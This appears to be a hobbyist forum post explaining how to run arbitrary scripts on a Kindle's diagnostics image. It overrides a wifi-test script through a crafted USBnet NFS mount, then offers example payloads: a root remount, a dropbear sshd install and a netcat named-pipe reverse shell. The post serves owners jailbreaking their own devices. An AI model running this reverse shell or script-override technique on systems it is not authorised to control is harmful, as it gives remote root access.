I've found a method to execute an arbitrary shell script using the diagnostics image. This is kind of useless for kindle 4 non touch since we already have an easier method but it may enable access to kindle touch.
The instructions are a bit complex. They assume that you know how to use usb ethernet and setup an NFS share.
1. Create a USBnet.xml file in your kindle's root directory (over usb). This file will describe a NFS mountpoint. We will use that functionality to override a script which can be executed by the wifi test item in the diagnostics image. The content of the xml file should look like:
<?xml version="1.0" standalone="no" ?>
<!-- USB Net info -->
<USB_NetInfo ipNumber="15" device_NFS_path="/opt/factory/tools/atheros/art_rel/art/bin/host/support/platformscripts" host_NFS_path="/path/to/nfs/share/on/host/" />
2. Setup an nfs share on your computer as /path/to/nfs/share/on/host/ (or whatever you want to call it).
3. Reboot your kindle in diagnostics mode
4. Enable USBnet (see previous post #202 for instructions). If your xml file was properly read you should see something like:
ipAddress : 192.168.15.244
netMask : 255.255.255.0
hostAddr : EE2900000015
host_NFS : /path/to/nfs/share/on/host/
5. Configure the network interface to use 192.168.15.201 on your computer. This is the IP address which the kindle will connect to to mount the NFS share.
6. In the same menu section as USBnet, mount the NFS share.
7. This is where things become interesting. On the NFS share, create an executable script called plat_YOSHI-SDIO.sh . Example content could be:
mount -o remount,rw /
echo "hey" > /hello.msg
echo "here" > /var/local/hello.msg
echo "ho" > /mnt/us/hello.msg
8. In the Misc individual diagnostics > Wifi Test menu, execute the WIFI ON item. This will run the above script. Note that the kindle might freeze afterwards but it's ok, the script was run.
9. Reboot and connect as a usb mass storage device. You should now have a hello.msg file.
This hasn't been tested on a touch yet but I've had confirmation that the script we're trying to override exists so it seems like a pretty safe bet.
Of course my example script is pretty useless. But something like the following script should get you working sshd in the diagnostics image if you can get your hands on a kindle 4 non touch dropbearmulti binary:
mount -o remount,rw /
cp /mnt/us/dropbearmulti /usr/local/bin/
ln -sfn /usr/local/bin/dropbearmulti /usr/local/sbin/dropbear
ln -sfn /usr/local/bin/dropbearmulti /usr/local/sbin/dropbearkey
/usr/local/bin/dropbearkey -t rsa -f /etc/dropbear/dropbear_rsa_host_key
You could also try setting up a reverse shell using provided binaries only.
On the host computer run:
In the script:
mknod in p
nc 192.168.15.201 1234 0< in | sh > in 2>&1
Once the script is run you should be able to run commands from the host as if on a normal shell (albeit without a prompt). For example running "find /" should output the full file listing.
I'd love to have feedback from touch owners.